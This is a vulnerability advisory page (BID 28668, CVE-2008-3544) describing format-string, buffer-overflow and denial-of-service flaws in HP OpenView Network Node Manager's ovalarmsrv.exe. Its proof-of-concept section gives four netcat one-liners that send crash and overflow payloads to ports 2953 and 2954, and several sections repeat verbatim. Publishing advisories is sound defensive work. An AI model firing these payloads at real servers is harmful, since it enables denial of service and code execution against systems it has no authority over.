HP OpenView Network Node Manager 'ovalarmsrv.exe' Multiple Remote Vulnerabilities
BID:28668
Info
HP OpenView Network Node Manager 'ovalarmsrv.exe' Multiple Remote Vulnerabilities
| Bugtraq ID: | 28668 |
| Class: | Unknown |
| CVE: |
CVE-2008-3544 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 07 2008 12:00AM |
| Updated: | Oct 09 2008 06:18PM |
| Credit: | Luigi Auriemma |
| Vulnerable: |
HP OpenView Network Node Manager 7.53 HP OpenView Network Node Manager 7.51 HP OpenView Network Node Manager 7.50 HP OpenView Network Node Manager 7.01 |
| Not Vulnerable: | |
Discussion
HP OpenView Network Node Manager 'ovalarmsrv.exe' Multiple Remote Vulnerabilities
HP OpenView Network Node Manager is prone to multiple vulnerabilities affecting the 'ovalarmsrv.exe' process. These issues include a format-string vulnerability, multiple buffer-overflow vulnerabilities, and a denial-of-service vulnerability.
Attackers can exploit these issues to execute arbitrary code with the privileges of the affected application or to consume excessive system resources. Successful exploits will compromise affected computers or cause denial-of-service conditions.
HP OpenView Network Node Manager 7.50 is vulnerable; the denial-of-service issue also affects version 7.53; other versions may also be affected.
HP OpenView Network Node Manager is prone to multiple vulnerabilities affecting the 'ovalarmsrv.exe' process. These issues include a format-string vulnerability, multiple buffer-overflow vulnerabilities, and a denial-of-service vulnerability.
Attackers can exploit these issues to execute arbitrary code with the privileges of the affected application or to consume excessive system resources. Successful exploits will compromise affected computers or cause denial-of-service conditions.
HP OpenView Network Node Manager 7.50 is vulnerable; the denial-of-service issue also affects version 7.53; other versions may also be affected.
Exploit / POC
HP OpenView Network Node Manager 'ovalarmsrv.exe' Multiple Remote Vulnerabilities
The following proofs of concept are available:
echo %n%n%s%n%n%s | nc SERVER 2953 -v -v
echo 62 AAAAAAAAAAAAA...512_'A's...AAAAAAAAAAAAA | nc SERVER 2954 -v -v
echo 47 1 2 what_you_want | nc SERVER 2954 -v -v -w 1
echo 25 0 0 10 boom | nc SERVER 2954 -v -v -w 2
Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following exploit code is available:
The following proofs of concept are available:
echo %n%n%s%n%n%s | nc SERVER 2953 -v -v
echo 62 AAAAAAAAAAAAA...512_'A's...AAAAAAAAAAAAA | nc SERVER 2954 -v -v
echo 47 1 2 what_you_want | nc SERVER 2954 -v -v -w 1
echo 25 0 0 10 boom | nc SERVER 2954 -v -v -w 2
Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following exploit code is available:
Solution / Fix
HP OpenView Network Node Manager 'ovalarmsrv.exe' Multiple Remote Vulnerabilities
Solution:
The vendor has released an advisory and patches to address these issues. Contact the vendor for details on obtaining the appropriate updates.
Solution:
The vendor has released an advisory and patches to address these issues. Contact the vendor for details on obtaining the appropriate updates.
References
HP OpenView Network Node Manager 'ovalarmsrv.exe' Multiple Remote Vulnerabilities
References:
References:
- HP OpenView Network Node Manager Product Page (HP)
- Directory traversal and multiple Denials of Service in HP OpenView (Luigi Auriemma
) - Multiple vulnerabilities in HP OpenView NNM 7.53 (Luigi Auriemma
)